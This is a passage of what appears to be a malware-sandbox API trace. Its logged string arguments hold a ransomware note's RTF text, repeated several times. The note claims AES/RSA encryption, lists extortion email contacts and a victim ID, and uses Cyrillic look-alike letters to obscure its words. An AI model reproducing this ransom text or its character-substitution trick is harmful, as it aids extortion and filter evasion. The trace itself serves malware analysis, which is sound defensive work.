Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s 